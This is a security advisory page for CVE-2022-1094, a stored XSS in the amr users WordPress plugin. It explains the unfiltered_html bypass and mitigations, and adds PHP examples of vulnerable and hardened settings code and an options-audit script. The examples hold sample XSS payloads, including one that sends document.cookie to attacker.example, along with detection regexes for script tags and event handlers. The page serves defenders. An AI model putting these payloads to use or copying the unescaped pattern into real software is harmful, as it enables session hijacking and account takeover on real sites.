
CVE-2022-1094: CWE-79 Cross-site Scripting (XSS) in Unknown amr users

Medium
Tags: Vulnerability, CVE-2022-1094, cve, cwe-79
Published: Mon Apr 25 2022 (04/25/2022, 15:51:16 UTC)
Source: CVE
Vendor/Project: Unknown
Product: amr users

Description

The amr users WordPress plugin before 4.59.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

AI-Powered Analysis

AI analysis last updated: 07/06/2025, 22:54:46 UTC

Technical Analysis

CVE-2022-1094 is a medium-severity CWE-79 (Cross-site Scripting) issue in the amr users WordPress plugin, affecting versions prior to 4.59.4. The plugin stores some of its settings without sanitising the input and renders them without escaping the output, so a user who can reach the plugin's settings page (in practice an administrator) can save a script payload that is persisted in the database and executed in the browser of anyone who later views the page that renders that setting.

The notable part is the bypass of unfiltered_html. WordPress strips script and other dangerous markup from content submitted by users who lack that capability, which is the case for every role except super admin on a multisite installation, and for every role when DISALLOW_UNFILTERED_HTML is defined in wp-config.php. That filtering is applied to core content paths such as post content; it does not cover arbitrary plugin options unless the plugin sanitises them itself. Because this plugin did not, an administrator who is deliberately denied unfiltered_html could still plant stored XSS, and the payload would run for the higher-privileged users (for example, a multisite super admin) who visit the affected page.

The CVSS v3.1 base score is 4.8 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N): network attack vector, low attack complexity, high privileges required, user interaction required (a victim must load the page that renders the setting), and a changed scope because the script executes in the victim's browser rather than in the vulnerable component itself, with low impact to confidentiality and integrity and none to availability. No known exploits in the wild have been reported, and the source data provides no patch link, but version 4.59.4 is identified as the fixed release. The plugin is used for managing user profiles and member lists on WordPress sites. Successful exploitation allows arbitrary JavaScript to run in the context of the site's admin area, which can be used for session hijacking, performing actions as the victim, or defacement.
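The pattern described above, as an added illustration written for this page; it is not code from the amr users plugin, whose actual settings code is not reproduced in the advisory. The option and function names (amr_demo_*) are hypothetical, and the snippet assumes a WordPress runtime for update_option, get_option, register_setting, esc_attr, esc_html, current_user_can and the nonce helpers. The vulnerable half shows why unfiltered_html does not help: nothing in the save path ever calls a kses filter, so whatever the administrator typed is stored and echoed verbatim.

```php
<?php
// Added illustration (not code from the amr users plugin): the CWE-79 pattern
// in a WordPress settings page, beside the hardened form.
// Option/function names amr_demo_* are hypothetical. Assumes a WordPress runtime.

// --- Vulnerable pattern: raw input stored, raw output rendered --------------
function amr_demo_save_settings_vulnerable() {
    // No nonce, no sanitisation. unfiltered_html is never consulted because
    // kses filtering only hooks core content paths, not update_option().
    update_option( 'amr_demo_label', wp_unslash( $_POST['amr_demo_label'] ) );
}

function amr_demo_render_vulnerable() {
    $label = get_option( 'amr_demo_label', '' );
    // Stored value is echoed unescaped inside an attribute and as text.
    // A saved value of  "><script>alert(document.cookie)</script>  runs for
    // every user who opens this page, including a multisite super admin.
    echo '<input type="text" name="amr_demo_label" value="' . $label . '">';
    echo '<p>' . $label . '</p>';
}

// --- Hardened pattern: sanitise on save, escape on output ------------------
function amr_demo_register_settings() {
    // register_setting() installs the callback on the sanitize_option_{$option}
    // filter, so every update_option() call for this option is sanitised,
    // whatever the role of the user saving it.
    register_setting( 'amr_demo_group', 'amr_demo_label', array(
        'type'              => 'string',
        'sanitize_callback' => 'sanitize_text_field',
        'default'           => '',
    ) );
}
add_action( 'admin_init', 'amr_demo_register_settings' );

function amr_demo_save_settings_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    check_admin_referer( 'amr_demo_save', 'amr_demo_nonce' );   // CSRF protection
    $raw = isset( $_POST['amr_demo_label'] ) ? wp_unslash( $_POST['amr_demo_label'] ) : '';
    // Sanitise explicitly as well; do not rely on the registered callback alone.
    update_option( 'amr_demo_label', sanitize_text_field( $raw ) );
}

function amr_demo_render_hardened() {
    $label = get_option( 'amr_demo_label', '' );
    // Escape for the exact output context: attribute value vs. HTML text.
    echo '<input type="text" name="amr_demo_label" value="' . esc_attr( $label ) . '">';
    echo '<p>' . esc_html( $label ) . '</p>';
    wp_nonce_field( 'amr_demo_save', 'amr_demo_nonce' );
}
```

Sanitising on save and escaping on output are both needed: sanitize_text_field removes tags from the stored value, while esc_attr and esc_html protect against values that reached the database by another route (a direct SQL write, an import, or an older plugin version that never sanitised). If a setting legitimately needs limited HTML, use wp_kses_post or wp_kses with an explicit allow-list instead of sanitize_text_field.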

Potential Impact

For European organizations, this vulnerability is relevant to those running WordPress sites with the amr users plugin installed. A stored payload in the plugin's settings executes for every user who views the affected admin page, so it can steal session cookies, perform actions in the victim's name (creating users, changing settings, installing plugins), or alter site content, leading to reputational damage, exposure of member data, and service disruption. Because exploitation requires an account that can edit the plugin's settings, the bar for an external attacker is high: an administrator account must first be compromised, or the attacker must be an insider. The risk is greatest where multiple administrators exist and where unfiltered_html is deliberately withheld, for example on multisite installations, since the flaw lets a site administrator reach users who outrank them. Where personal data of members is exposed, the incident may also trigger GDPR breach-notification obligations and potential penalties.

Mitigation Recommendations

European organizations should verify the installed version of the amr users plugin (for example with WP-CLI: wp plugin list) and upgrade to 4.59.4 or later, where the issue is addressed. Note that DISALLOW_UNFILTERED_HTML and multisite capability restrictions do not mitigate this flaw; that is precisely what the advisory says is bypassed. If upgrading is not immediately possible, restrict access to the WordPress admin dashboard to trusted personnel, enforce multi-factor authentication on administrator accounts, and review who holds the administrator role. After upgrading, audit the plugin's stored settings in wp_options for script tags, event-handler attributes, or javascript: URIs, since a payload planted before the fix survives the update. A Web Application Firewall can add a layer of defence, but WAF rules for XSS are routinely bypassed and many deployments do not inspect authenticated admin traffic, so treat it as a supplement rather than a fix. Finally, monitor logs for unexpected settings changes and administrative logins, and include WordPress installations in periodic vulnerability scans.
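The settings audit suggested above, as an added example that is not part of the advisory or the plugin. The function walks an array of option values, including PHP-serialised arrays as WordPress stores them, and flags anything that looks like active content. The sample data is constructed for the example; on a live site you would pass the output of wp_load_alloptions() instead, for instance by running the file with wp eval-file. The pattern list is an assumption and will also match legitimate HTML in some options, so every hit needs manual review.

```php
<?php
// Added example (not part of the advisory or the amr users plugin): flag stored
// option values that contain script-like content. Runs offline on the
// constructed sample below; on a real site feed it wp_load_alloptions().
// The pattern list is an assumption; extend it for your site.

/**
 * Return [option_name => matched_pattern] for every value that looks like it
 * carries active content. Nested arrays and serialised strings are walked.
 */
function amr_audit_find_suspicious_options( array $options, string $prefix = '' ): array {
    $patterns = array(
        'script tag'      => '/<\s*script\b/i',
        'event handler'   => '/\bon[a-z]+\s*=/i',
        'javascript: URI' => '/javascript\s*:/i',
        'data: URI'       => '/data\s*:\s*text\/html/i',
        'active element'  => '/<\s*(svg|iframe|object|embed)\b/i',
    );
    $hits = array();
    foreach ( $options as $name => $value ) {
        $key = $prefix === '' ? (string) $name : $prefix . '.' . $name;
        if ( is_array( $value ) ) {
            $hits += amr_audit_find_suspicious_options( $value, $key );
            continue;
        }
        if ( ! is_string( $value ) ) {
            continue;
        }
        // WordPress stores arrays as PHP-serialised strings. Unserialise with
        // object instantiation disabled so the audit itself cannot be abused.
        $decoded = @unserialize( $value, array( 'allowed_classes' => false ) );
        if ( is_array( $decoded ) ) {
            $hits += amr_audit_find_suspicious_options( $decoded, $key );
            continue;
        }
        foreach ( $patterns as $label => $re ) {
            if ( preg_match( $re, $value ) ) {
                $hits[ $key ] = $label;
                break;
            }
        }
    }
    return $hits;
}

// Constructed sample resembling rows from wp_options (not real data).
$sample = array(
    'blogname'         => 'Example Site',
    'amr_users_label'  => 'Members "><script>fetch("//attacker.example/?c="+document.cookie)</script>',
    'amr_users_config' => serialize( array(
        'heading' => 'Directory',
        'footer'  => '<img src=x onerror=alert(1)>',
    ) ),
    'admin_email'      => 'admin@example.org',
);

foreach ( amr_audit_find_suspicious_options( $sample ) as $name => $why ) {
    printf( "SUSPICIOUS %-30s %s\n", $name, $why );
}
```

Against the constructed sample this reports amr_users_label (script tag) and amr_users_config.footer (event handler) and stays silent on the benign rows. Run it before and after the upgrade: the plugin update fixes the code path, but it does not clean a payload that was already saved.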


Technical Details

Data Version
5.1
Assigner Short Name
WPScan
Date Reserved
2022-03-25T00:00:00.000Z
Cisa Enriched
true
Cvss Version
3.1
State
PUBLISHED

Threat ID: 682d981ec4522896dcbdbc74

Added to database: 5/21/2025, 9:08:46 AM

Last enriched: 7/6/2025, 10:54:46 PM

Last updated: 8/1/2025, 6:10:45 AM
